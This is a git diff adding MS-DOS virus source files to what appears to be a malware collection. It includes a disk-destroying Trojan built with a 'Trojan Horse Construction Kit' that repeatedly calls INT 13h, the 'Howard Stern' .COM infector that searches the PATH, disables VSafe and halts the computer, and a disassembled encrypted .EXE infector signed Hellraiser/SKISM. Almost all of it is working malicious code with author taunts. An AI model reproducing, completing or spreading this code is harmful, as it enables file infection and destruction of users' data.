+ + and ah,0011b ;AX,CX,DX + cmp ah,0011b ;00,01,02 + jne okreg2 + dec ah +okreg2: + + and byte ptr [loadcount-adjust],11111000b + or byte ptr [loadcount-adjust],ah + + and byte ptr [deccount-adjust],11111000b + or byte ptr [deccount-adjust],ah + + mov ax,word ptr [First_instr-adjust] + xchg ah,al + mov word ptr [First_instr-adjust],ax + + ret + + +adjustreg: + + cmp al,0011b + je abx + cmp al,0101b + je abp + cmp al,0110b + je asi + mov al,0101b + ret +abx: + mov al,0111b + ret +abp: + mov al,0110b + ret +asi: + mov al,0100b + ret + + +msg: + +First_18: + + ret + db 17 dup (?) + + +endcode label word + + current_21h dd ? + current_13h dd ? + org_2fh dd ? + org_13h dd ? + org_21h dd ? + Floppy_org_13h dd ? + flag db ? ;0ff if error occure + veri db ? + handle dw ? + fname db 8+3 dup (?) + function db ? + my_flag db ? + limit dw ? + mem_ dw ? + next_flag db ? + ret_addr dw ? + +buffer label word + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.host.asm b/MSDOS/Virus.MSDOS.Unknown.host.asm new file mode 100644 index 00000000..724618e3 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.host.asm @@ -0,0 +1,20 @@ + + + .model tiny + + .code + +;****************************************************************************** +;The host program starts here. This one is a dummy that just returns control +;to DOS. + public HOST + + db 100 dup (0) +HOST: + mov ax,4C00H ;Terminate, error code = 0 + int 21H + +HOST_END: + + END + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.house.asm b/MSDOS/Virus.MSDOS.Unknown.house.asm new file mode 100644 index 00000000..05b5d6b8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.house.asm @@ -0,0 +1,88 @@ +; Trojan Horse Constructed with... +; The Trojan Horse Construction Kit, v1.00 +; Copyright(c) 1992, Stingray/VIPER +; A Viral Inclined Programming Experts Ring Programming Team Production. + +IDEAL +DOSSEG +MODEL small +STACK 256 +DATASEG +msg_1 db "",13,10 + db "This is a Trojain horse. Curtocy of White Shark! HA HA HA",13,10 + db "",13,10 + db "Mess with White Shark and you'll be eaten alive!",13,10 + db "",13,10 + db "",13,10 + db "",13,10 + db "",13,10 + db "",13,10 + db "",13,10 + db '$' +msg_2 db "",13,10 + db "You've been fucked! Curtocy of White Shark!",13,10 + db "",13,10 + db "Mess with White Shark and you'll be eaten alive!",13,10 + db "",13,10 + db "",13,10 + db "",13,10 + db "",13,10 + db "",13,10 + db "",13,10 + db '$' +vip db "}Ǿ}Ծ}¾}ŋ",106,103 + db "}Ǿ}}}щ}ӎ",106,103 + db "}}}Ͼ}}Ͼ}}ċ",106,103 +CODESEG +Start: + mov ax,@data + mov ds,ax + + mov ah,9 + mov dx,offset msg_1 + int 21h + mov dl,24 +aqui: + call fry + call fry + call fry + inc dl + cmp dl,1 + jne aqui + mov ah,9 + mov dx,offset msg_2 + int 21h + mov si,offset vip + call DeCrypt_Print + jmp Exit +PROC DeCrypt_Print + push ax + push dx +here: + lodsb + or al,al + je no_mas + xchg dl,al + sub dl,93 + mov ah,2 + int 21h + jmp short here +no_mas: + pop ax + pop dx + ret +ENDP DeCrypt_Print +PROC fry + push dx + mov ax,ds + mov es,ax + mov ax,0701h + mov ch,0 + int 13h + pop dx + ret +ENDP fry +Exit: + mov ax,4c00h + int 21h + END Start diff --git a/MSDOS/Virus.MSDOS.Unknown.howard.asm b/MSDOS/Virus.MSDOS.Unknown.howard.asm new file mode 100644 index 00000000..a7fb486e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.howard.asm @@ -0,0 +1,472 @@ +; E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu +; uK E- +; E- 'HOWARD STERN ViRUS ASM SOURCE' Nu +; Nu KE +; KE ~~~~~~~~~~~~~~~~~~~~~~~~~~~ -N +; -N by uK +; uK DEATHBOY [NuKE] E- +; E- Nu +; E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu +; +; [HOWARD].ASM -- The Howard Stern virus +; +; Written by DeathBoy[NuKE] +; +; Well, this ought to turn some heads... NOT... this is the source code for +; a New Virus... It displays ' I'm Not working until Howard Stern is Done +; @ 11:00 am. Bow down Before the King.' if the infected program is ran +; anytime before 11:00 am.===> Then lock up the Computer! +; It is a Non-Resident .COM infector that is 967 bytes long +; compiled...TO make this a Working DEMO...you will need TASM v2.0 +; or better... ( TASM /mx /m2 /q HOWARD.asm ) then +; ( TLINK /x /t HOWARD.obj ) +; the result should be a 1003 byte *.COM file infector that follows +; the DOS PATH= looking for victim files... +; it will only infect 2 files per execution +; of an infected file... +; +; CHEERS TO YOU HOWARD & Robin, I'm a Big FAN... Please +; COME TO ATLANTA, GA... +; Infinity ( 92.9 FM ) has the GreaseIdiot on & I'm +; going Crazy! +; +; Ps. I thought the Book was funny, #2 on the Best-seller's list in the +; area Stores ( & YOU ARE NOT ON DOWN HERE !!! ) ... Keep it up... +; +;=====> The intent of this VIRUS is not to destroy but to Annoy, ! +;Please do not give anyone this virus unless they want it, Knowingly ... +; You are responsible for your actions... +; +; BTW, there is a slight Bug in the Virus, put there on purpose +; It is an easy one to find & FIX... IF you can fix it, +; then :) You do not need to register. +; +; If not... then you do not need to know how. +; OR +; If you register however, I will take out the 'Beg/Buggy-Code' +; +; Get you AV idiots... FYA ESAD YMABFFW +; +; Long Live [NuKE], ARiSToTLE, NT, BO, & the latest [NuKE] +; member .. NoSFaRTu(sp) :) +; +;----------------------------CUT HERE----------------------------------- +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +main proc near + push di ; Stupid Shit For Stupid + push bp ; Programs + push dx ; + mov ax,05FEh ; Trash some mem. res. + mov dx,0A6BAh ; software... + not ax ; + not dx ; + int 16h ; golly wally, did that work? + mov ax,05FDh ; + mov dx,0A6BAh ; Maybe this time ??? + mov bx,0000h ; + not ax ; + not dx ; + int 16h ; + pop dx ; + pop bp ; + pop di ; Ok. lets do this. + + db 0E9h,00h,00h ; Standard BS pointer +start: call get_loc ; Like an Old trick +get_loc: pop bp ; BP holds old IP + sub bp,offset get_loc; Adjust for length of host + lea si,[bp + buffer] ; SI points to original start + mov di,0100h ; Push 0100h on to stack for + + xchg ax,bx ; beat the heat + xchg bx,ax ; with clean code + push di ; return to main program + movsw ; Copy the first two bytes + movsb ; Copy the third byte + + mov di,bp ; DI points to start of virus + + push sp ; doing the nasty with the + pushf ; stupid coding. + push bp ; Are you sure you know + push di ; what you are doing?? + push dx ; Doesn't look it?? + + call disvsafe ; Ahh, FiDO-DoRKS LOOK HERE + pop dx ; Snoop-doogy dawg... + pop di ; Yippie-Oh Yippie-heh. + pop bp ; + popf ; Freedom to do as I please. + pop sp ; + + mov bp,sp ; BP points to stack + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer on stack + xchg ax,bx ; Do Stuff for fun. + xchg ax,bx ; Reiterate that + int 021h ; R U still reading this?? + ; WHy??? :^) + + call search_me ; Find and infect a file + call search_me ; 2 files + + call get_hour + cmp ax,000Bh ; Did the function return 11? + jle go_next ; If less than or equal, do effec + jmp not_yet ; Otherwise skip over it +go_next: cmp ax,0006h ; Before 6:00am ?? + jge strt00 ; Yep, Go do it + jmp not_yet ; Nop, let get outta here + +strt00: + push sp ; More BS... for the + pushf ; Bytes... + push bp ; + push di ; It looks good in hex :) + push dx ; Not! Show me some fucked + ; code please!!! + mov ah,09h ; BIOS display char. function + mov dx, offset data01 ; whoop there it is... + int 21h + pop dx ; This is just for kicks + pop di ; & giggles... + pop bp ; Something tells + popf ; me to do this... + pop sp ; just for laughs + + lea si,[di + data00] ; SI points to shit + call show_this + + mov cx,45h ; number of flashes +flash: + xor ax,ax ; Clear Register + mov al,0FFh ; Load binary flags + mov dx,060h ; Port number + out 060h,al ; Toggle Keyboard lights + dec cx ; lets do it one less time + nop ; good for what ails you. + jcxz getout ; ok, I'm thru. + nop + loop flash ; nah, I want to do it again + + +getout: cli ; Clear the interrupt flag + hlt ; HALT the computer + jmp $ ; Why not?? + + +not_yet: xor ax,ax ; Clear Register + mov al,0FFh ; Load binary flags + mov dx,060h ; Port number + out 060h,al ; Toggle Keyboard lights + dec cx ; lets do it one less time + nop ; good for what ails you. + jcxz com_end ; ok, I'm thru. + loop not_yet ; nah, I want to do it again + + +com_end: pop dx ; DX holds DTA address + mov ah,01Ah ; DOS set DTA function + int 021h + mov sp,bp ; Deallocate local buffer + xor ax,ax ; + mov bx,ax ; + mov cx,ax ; + mov dx,ax ; DUMP out the registers + mov si,ax ; + mov di,ax ; + mov bp,ax ; + + ret ; Return to original program +main endp + +disvsafe proc near ; Well, Now this + mov ax,05FEh ; is abusive. + mov dx,0A6BAh ; + not ax ; + not dx ; + int 16h ; Pretty Stupid, Huh? + mov ax,05FDh ; Ha... You're looking + mov dx,0A6BAh ; at it aren't you?? + mov bx,0000h ; + not ax ; + not dx ; Yep, Lamest... + int 16h ; + ret ; +disvsafe endp + +search_me proc near + mov bx,di ; BX points to the virus + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,135 ; Allocate 135 bytes on stack + + mov byte ptr [bp - 135],'\' ; Start with a backslash + + mov ah,01h ; Clean code, Clean code... + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 134] ; SI points to 64-byte buffer + int 021h + + call scan_path ; Start scanning + +scanpath_loop: cmp word ptr [bx + path_ad],0 ; Was the search unsucces + je found_none ; If so then we're done + call found_sub ; Otherwise copy the subdirectory + + mov ax,cs ; AX holds the code segment + mov ds,ax ; Set the data and extra + mov es,ax ; segments to the code segment + + xor al,al ; Zero AL + stosb ; NULL-terminate the directory + + xor ah,ah ; Clear register + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 70] ; DX points to the directory + int 021h + + lea dx,[bx + com_mask] ; DX points to '*.COM' + push di + mov di,bx + call find_me ; Try to infect a .COM file + mov bx,di + pop di + jnc found_none ; If successful the exit + jmp short scanpath_loop ; Keep checking the PATH + +found_none: mov ah,03Bh ; DOS change directory function + lea dx,[bp - 135] ; DX points to old directory + int 021h + + cmp word ptr [bx + path_ad],0 ; Did we run out of direc + jne try_again ; If not then exit + stc ; Set the carry flag for failure +try_again: mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller +com_mask db '*.COM',0 ; Mask for all .COM files +search_me endp + +scan_path proc near + mov es,word ptr cs:[002Ch] ; ES holds the enviroment s + xor di,di ; DI holds the starting offset + +find_path: lea si,[bx + path_string] ; SI points to 'PATH=' + lodsb ; Load the 'P' into AL + xor cl, cl ; Clean those registers + mov cx,08000h ; Check the first 32767 bytes + repne scasb ; Search until the byte is found + mov cx,4 ; Check the next four bytes +check_next_4: lodsb ; Load the next letter of 'PATH=' + scasb ; Compare it to the environment + jne find_path ; If there not equal try again + loop check_next_4 ; Otherwise keep checking + + mov word ptr [bx + path_ad],di ; Save the PATH add + mov word ptr [bx + path_ad + 2],es ; Save the PATH's s + ret ; Return to caller + +path_string db 'PATH=' ; The PATH string to search for +path_ad dd ? ; Holds the PATH's address +scan_path endp + +found_sub proc near + lds si,dword ptr [bx + path_ad] ; DS:SI points to P + lea di,[bp - 70] ; DI points to the work buffer + push cs ; Transfer CS into ES for + pop es ; byte transfer +move_sub: lodsb ; Load the next byte into AL + cmp al,';' ; Have we reached a separator? + je moved_one ; If so we're done copying + or al,al ; Are we finished with the PATH? + je moved_last_one ; If so get out of here + stosb ; Store the byte at ES:DI + jmp short move_sub ; Keep transfering characters + ; keep it up + +moved_last_one: mov si,0000h ; Zero SI to signal complet +moved_one: mov word ptr es:[bx + path_ad],si ; Store SI in the pa + ret ; Return to caller +found_sub endp + +find_me proc near + push bp ; Save BP + mov ah,0FFh ; Clean code + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,0FFh ; Clean code + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer on stack + xchg ax,bx ; Lets do the Time + xchg ax,bx ; warp again + int 021h + mov ah,0FFh ; Clean code just for fun + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc found_out ; Exit if no files found + call infect_file ; Infect the file! + jnc found_out ; Exit if no error + mov ah,0FFh ; Clean code + mov ah,04Fh ; DOS find next file function + jmp short find_a_file; Try finding another file + +found_out: mov sp,bp ; Restore old stack frame + mov ah,0FFh ; Clean code + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_me endp ; Are you reading this + ; nonsense? + +show_this proc near + mov ah,0Eh ; BIOS display +loop_this: lodsb ; Load next char. into AL + or al,al ; Is the character a null? + je show_ended ; Yep, exit + int 010h ; BIOS video interrupt + jmp short loop_this ; Do next character +show_ended: + ret ; Return to caller +show_this endp + +data00 db ' I'm not working until Howard Stern is done @ 11:00 am + db ' Bow down before the King ',13,12 + db ' Smile ... [NuKE] loves you',13,10,13,10,07,13,0 +data01 db ' I'm not working until Howard Stern is done @ 11:00 am + +infect_file proc near + mov ah,0FFh ; Clean code, yeaah suuure + mov ah,02Fh ; DOS get DTA address function + int 021h + mov si,bx ; SI points to the DTA + mov byte ptr [di + set_carry],0 ; Assume we'll fail + cmp word ptr [si + 01Ah],(65279 - (finish - start)) + jbe we_be_good ; If it's small enough continue + jmp infection_done ; Otherwise exit +we_be_good: mov ax,03D00h ; DOS open file function, r/o + lea dx,[si + 01Eh] ; DX points to file name + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,3 ; CX holds bytes to read (3) + lea dx,[di + buffer] ; DX points to buffer + int 021h + mov ah,0FFh ; Clean code + xor ah,ah ; Clean the registers + mov ah,0FFh ; Clean code again + xor ah,ah ; Clean the registers + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + xchg dx,ax ; Faster than a PUSH AX + mov ah,03Eh ; DOS close file function + int 021h + xchg dx,ax ; Faster than a POP AX + + sub ax,finish - start + 3 ; Adjust AX for a valid jum + cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet + je infection_done ; If equal then exit + mov byte ptr [di + set_carry],1 ; Success -- the file + add ax,finish - start ; Re-adjust to make the jum + mov word ptr [di + new_jump + 1],ax ; Construct jump + + mov ax,0BCFEh ; DOS set file attrib. function + xor cx,cx ; Clear all attributes + lea dx,[si + 01Eh] ; DX points to victim's name + not ax + int 021h + + mov ax,0C2FDh ; DOS open file function, r/w + not ax + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,040h ; DOS write to file function + mov cx,3 ; CX holds bytes to write (3) + lea dx,[di + new_jump] ; DX points to the jump we made + int 021h + + xor ah,ah ; Clear Registers + xor ax,ax + mov ax,0BDFDh ; DOS file seek function, EOF + not ax + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + mov ah,69h + mov ah,040h ; DOS write to file function + mov cx,finish - start; CX holds virus length + lea dx,[di + start] ; DX points to start of virus + int 021h + mov ah,69h + xor ax,ax + mov ax,0A8FEh ; DOS set file time function + mov cx,[si + 016h] ; CX holds old file time + mov dx,[si + 018h] ; DX holds old file date + not ax + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + mov ax,0BCFEh ; DOS set file attrib. function + xor ch,ch ; Clear CH for file attribute + mov cl,[si + 015h] ; CX holds file's old attributes + lea dx,[si + 01Eh] ; DX points to victim's name + not ax + int 021h + +infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if fa + ret ; Return to caller + +set_carry db ? ; Set-carry-on-exit flag +buffer db 090h,0CDh,020h ; Buffer to hold old three bytes +new_jump db 0E9h,?,? ; New jump to virus +infect_file endp + +get_hour proc near + mov ah,02Ch ; DOS get time function + int 021h + mov al,ch ; Copy hour into AL + cbw ; Sign-extend AL into AX + ret ; Return to caller +get_hour endp + + +note db ' 1234567890!@#$%^&*()ascii ' + db ' (c) Ba Ba Stupid... ' + db ' Remember Studderin' John ' + db ' Robin, I love You! ' + db ' Long Live [NuKE] ' + db 12h,13h,17h,19h + db ' Georgia needs Howard Stern' + +finish label near + +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.hr.asm b/MSDOS/Virus.MSDOS.Unknown.hr.asm new file mode 100644 index 00000000..9f066a02 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hr.asm @@ -0,0 +1,412 @@ +;NAME: HR.DEC +;FILE SIZE: 0062Ch - 1580d +;START (CS:IP): 00100h +;CODE END: 0072Ch +;CODE ORIGIN: 00100h +;DATE: Sun Aug 02 17:20:02 1992 + +CODE SEGMENT BYTE PUBLIC 'CODE' +ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING + +P00100 PROC + ORG 0100h + +START: JMP Short BEGIN +;--------------------------------------------------- + NOP +ENCRKEY:DB 0Ch,32h ; 32h may not be needed... ;OR AH,32 +BEGIN: CALL CRYPT ; Decrypt the virus + JMP H00520 +;--------------------------------------------------- +CRYPT: PUSH CX + MOV SI,OFFSET MESSAGE + MOV DI,SI + MOV CX,0766h + CLD +LOOP_1: LODSW + XOR AX,DS:ENCRKEY ;DS may not be needed + STOSW + DEC CX + JNZ LOOP_1 + POP CX + RET +;--------------------------------------------------- +INFECT: MOV DX,0100h ;Offset to begin at + MOV BX,DS:[HANDLE] ;BX=File handle + PUSH BX ;I don't know why, BX doesn't change. + MOV CX,062Ch ;CX=number of bytes to write + CALL CRYPT ;Encrypt before saving + POP BX ;I don't know why, BX doesn't change. + MOV AX,4000h ;AH = 40h, write to file. + INT 21h ;Infect the file. + PUSH BX ;Again, BX never changes. + CALL CRYPT ; . . . . . . . . . + POP BX + RET ;RET_Near +;--------------------------------------------------- +; This is the big, red, block letters that shows when it goes off. +MESSAGE: +DB 0Fh,10h,18h,19h,1Fh,"I'll be back..." +DB 18h,18h,14h,20h,20h,00Ch,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h +DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h +DB 20h,0DEh,10h,19h,05h,14h,19h,05h,0DEh,10h,20h,20h,14h,19h,06h +DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h +DB 14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,18h,20h,20h,0DEh,10h +DB 20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,20h,20h +DB 0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,06h,16h,0DEh +DB 10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h +DB 05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,18h,20h +DB 20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h +DB 04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,20h +DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h +DB 20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h +DB 20h,16h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h +DB 0DEh,10h,20h,20h,14h,20h,20h,16h,0DEh,18h,14h,19h,05h,0DEh,10h,20h +DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh +DB 10h,19h,05h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h +DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h +DB 19h,05h,16h,0DEh,10h,20h,14h,19h,04h,0DEh,10h,20h,20h,14h,20h,20h +DB 0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh,10h,20h,14h,20h,20h +DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h +DB 04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,04h,0DEh,10h,19h,02h,14h +DB 19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,16h +DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,19h,04h,16h,0DEh,18h,14h +DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h +DB 20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh +DB 10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h +DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh +DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh +DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h +DB 0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h +DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h +DB 14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h +DB 14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,10h,19h,03h,14h +DB 20h,10h,19h,02h,14h,20h,20h,10h,19h,05h,14h,20h,20h,10h,19h,06h,14h,20h +DB 20h,10h,20h,20h,14h,20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h +DB 02h,14h,20h,10h,19h,02h,14h,20h,20h,10h,20h,20h,14h,20h,10h,19h +DB 03h,14h,20h,20h,10h,19h,06h,14h,20h,20h,10h,19h,04h,14h,20h +DB 10h,19h,02h,14h,20h,20h,18h,20h,10h,19h,03h,14h,20h,10h,19h,02h +DB 14h,20h,10h,19h,06h,14h,20h,10h,19h,07h,14h,20h,10h,19h,02h,14h +DB 20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,06h,14h,20h +DB 10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,07h,14h,20h,10h,19h +DB 05h,14h,20h,10h,19h,03h,14h,20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h +DB 07h,14h,20h,10h,19h,02h,14h,20h,10h,19h,07h,14h,20h,10h,19h,06h +DB 14h,20h,10h,19h,07h,14h,20h,10h,19h,07h,14h,20h,10h,19h,00Ah,14h +DB 20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h,07h,14h,20h,10h,19h,13h,14h +DB 20h,10h,19h,10h,14h,20h,18h,10h,19h,40h,14h,20h,18h,18h,2Ah +;--------------------------------------------------- + DB 00 ;00454 + DB "*.EXE" ;00455 + DB 00h,"\",00h,03h ;0045A + DB 8 DUP("?") ;0045E 3F + DB " " ;00466 202020 +;--------------------------------------------------- +;This area is perplexing. Doesn't seem to be ever called, nor read from. + ADC AX,[BP+DI] ;00469 1303 __ + ADD [BX+SI],AL ;0046B 0000 __ + ADD [BP+SI],CH ;0046D 002A _* + SHR BP,1 ;0046F D1ED __ + DEC DX ;00471 4A J + ADC DL,DS:[0E278h] ;00472 121678E2 __x_ + PUSH SS ;00476 16 _ + ADD [BX+SI],AL ;00477 0000 __ + ADD [BX+SI],AL ;00479 0000 __ +;--------------------------------------------------- + DB "ARMOR" ;0047B 41524D4F52 + DB 00h ;00480 + DB " " ;00481 2020 + DB 00h ;00483 + DB 00h ;00484 + DB 00h ;00485 + DB 00h ;00486 + DB 00h ;00487 + DB 03h ;00488 + DB 8 DUP("?") ;00489 3F + DB "EXE" ;00491 455845 + DB 07h ;00494 + DB 04h ;00495 + DB 00h ;00496 + DB "3" ;00497 33 + DB 1Fh ;00498 + DB "*" ;00499 2A + DB 0D1h ;0049A + DB 0EDh ;0049B + DB "J " ;0049C 4A20 + DB 02h ;0049E + DB "x" ;0049F 78 + DB 0F0h ;004A0 + DB 16h ;004A1 + DB 02h ;004A2 + DB 00h ;004A3 + DB 00h ;004A4 + DB 00h ;004A5 + DB "SAMPLE3.EXE" ;004A6 53414D504C4533 + DB 00h ;004B1 + DB 00h ;004B2 + DB 9Eh ;004B3 + DB "-]" ;004B4 2D5D + DB 04h ;004B6 + DB 88h ;004B7 + DB 04h ;004B8 + DB 9Eh ;004B9 + DB "-" ;004BA 2D + DB 00h ;004BB + DB "ARMOR" ;004BC 41524D4F52 + DB 00h ;004C1 + DB 58 DUP(00h) ;004C2 +HANDLE: DB 05h ;004FC + DB 00h ;004FD + DB 02h ;004FE + DB "x" ;004FF 78 + DB 0F0h ;00500 + DB 16h ;00501 + DB " " ;00502 20 + DB 00h ;00503 + DB 0CDh ;00504 + DB " " ;00505 20 + DB 00h ;00506 + DB 00h ;00507 + DB "Written by Dennis Yelle" ;00508 5772697474656E + DB 00h ;0051F +;--------------------------------------------------- +; Create new encryption key +H00520: MOV AX,3000h ;00520 B80030 __0 + INT 21h ;2-DOS_Ver ;00523 CD21 _! + CMP AL,02h ;00525 3C02 <_ + JB H0056B ;00527 7242 rB + MOV AH,2Ch ;00529 B42C _, + INT 21h ;1-Get_Time ;0052B CD21 _! + MOV DS:[0103h],DX ;0052D 89160301 ____ +; Check to see if it's the last Friday in month, if so, go off. +H00531: MOV AH,2Ah ;00531 B42A _* + INT 21h ;1-Get_Date ;00533 CD21 _! + CMP DL,19h ;00535 80FA19 ___ + JL H0053E ;00538 7C04 |_ + CMP AL,05h ;0053A 3C05 <_ + JZ H00541 ;0053C 7403 t_ +H0053E: JMP H005F2 ;0053E E9B100 ___ +;--------------------------------------------------- +; GO OFF! +H00541: MOV AH,0Fh ;00541 B40F + INT 10h ;Get current vid mode ;00543 CD10 + CMP AL,07h ;00545 3C07 + JZ H00568 ;If mono, format ;00547 741F + MOV AX,0003h ;80x25 16 color ;00549 B80300 + INT 10h ;Set video mode ;0054C CD10 + MOV AH,01h ;0054E B401 + MOV CX,0808h ;No cursor ;00550 B90808 + INT 10h ;Set cursor size ;00553 CD10 + MOV SI,013Ah ;00555 BE3A01 + MOV AX,0B800h ;Video segment ;00558 B800B8 + MOV ES,AX ;ES_Chg ;0055B 8EC0 + MOV DI,0000h ; ;0055D BF0000 + MOV CX,0319h ;00560 B91903 + CALL H0057E ; . . . . . . . . . ;00563 E81800 + JMP Short H00531 ;00566 EBC9 +;--------------------------------------------------- +H00568: JMP Short H005DC ;00568 EB72 _r +;--------------------------------------------------- + NOP ;0056A 90 _ +H0056B: JMP H0061E ;0056B E9B000 ___ +;--------------------------------------------------- + DB " -=PHALCON=- " ;0056E 20202D3D504841 + DB 00h ;0057D + +;--------------------------------------------------- +; Display message... TheDraw algorythm for unpacking image. +H0057E: JCXZ H005DB ;Jumps to a ret ;0057E E35B _[ + MOV DX,DI ;00580 8BD7 __ + XOR AX,AX ;00582 33C0 3_ + CLD ;00584 FC _ +H00585: LODSB ;Take a byte ;00585 AC _ + CMP AL,20h ;If it's + MOV BX,DS:[HANDLE] ;006BF 8B1EFC04 ____ + INT 21h ;2-Close_Fl_Hdl ;006C3 CD21 _! + MOV BX,DS:[0504h] ;006C5 8B1E0405 ____ + CMP BX,03EBh ;006C9 81FBEB03 ____ + JNZ H006DE ;006CD 750F u_ +H006CF: MOV AH,1Ah ;006CF B41A __ + MOV DS,DS:[04B9h] ;DS_Chg ;006D1 8E1EB904 ____ + MOV DX,DS:[04B7h] ;006D5 8B16B704 ____ + INT 21h ;1-Set_DTA ;006D9 CD21 _! + JMP H00653 ;006DB E975FF _u_ +;--------------------------------------------------- +H006DE: MOV DX,04A6h ;006DE BAA604 ___ + MOV AX,3D02h ;006E1 B8023D __= + INT 21h ;2-Open_Fl_Hdl ;006E4 CD21 _! + MOV DS:[HANDLE],AX ;006E6 A3FC04 ___ + CALL INFECT ; . . . . . . . . . ;006E9 E834FA _4_ +H006EC: MOV AX,5701h ;006EC B80157 __W + MOV BX,DS:[HANDLE] ;006EF 8B1EFC04 ____ + MOV CX,DS:[04FEh] ;006F3 8B0EFE04 ____ + MOV DX,DS:[0500h] ;006F7 8B160005 ____ + INT 21h ;2-Fl_Hdl_Date_Time ;006FB CD21 _! + MOV AX,4301h ;006FD B80143 __C + MOV CX,DS:[0502h] ;00700 8B0E0205 ____ + MOV DX,04A6h ;00704 BAA604 ___ + INT 21h ;2-Fl_Hdl_Attr ;00707 CD21 _! + MOV AH,3Bh ;00709 B43B _; + MOV DX,045Bh ;0070B BA5B04 _[_ + INT 21h ;2-Chg_Dir ;0070E CD21 _! + MOV AH,3Bh ;00710 B43B _; + MOV DX,04BCh ;00712 BABC04 ___ + INT 21h ;2-Chg_Dir ;00715 CD21 _! + MOV AX,4C00h ;00717 B8004C __L + INT 21h ;2-TERM_w_Ret_Cd ;0071A CD21 _! +;--------------------------------------------------- + DB "Hellraiser/SKISM" ;0071C 